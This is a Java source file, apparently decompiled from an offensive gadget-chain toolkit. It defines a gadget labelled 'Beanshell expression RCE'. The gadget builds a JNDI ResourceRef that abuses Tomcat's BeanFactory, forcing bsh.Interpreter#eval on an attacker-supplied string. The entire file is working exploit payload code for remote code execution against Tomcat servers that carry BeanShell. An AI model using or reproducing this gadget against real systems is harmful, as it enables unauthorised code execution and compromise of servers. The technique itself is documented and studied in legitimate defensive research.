package com.ar3h.chains.gadget.impl.jndi.factory.beanfactory.expression;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import org.apache.naming.ResourceRef;

@GadgetAnnotation(name = "Beanshell表达式RCE", description = "factory: org.apache.naming.factory.BeanFactory\nJNDI Reference的一种，通过BeanFactory调用单String方法 bsh.Interpreter#eval", dependencies = {"tomcat", "beanshell:bsh"}, priority = 50)
@GadgetTags(tags = {Tag.ResourceRef, Tag.TomcatBeanFactory}, nextTags = {Tag.Beanshell_Expr})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/jndi/factory/beanfactory/expression/BeanshellRef.class */
public class BeanshellRef implements Gadget {
    public Reference getObject(String str) throws Exception {
        ResourceRef resourceRef = new ResourceRef("bsh.Interpreter", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
        resourceRef.add(new StringRefAddr("forceString", "a=eval"));
        resourceRef.add(new StringRefAddr("a", str));
        return resourceRef;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject((String) gadgetChain.doCreate(gadgetContext));
    }
}
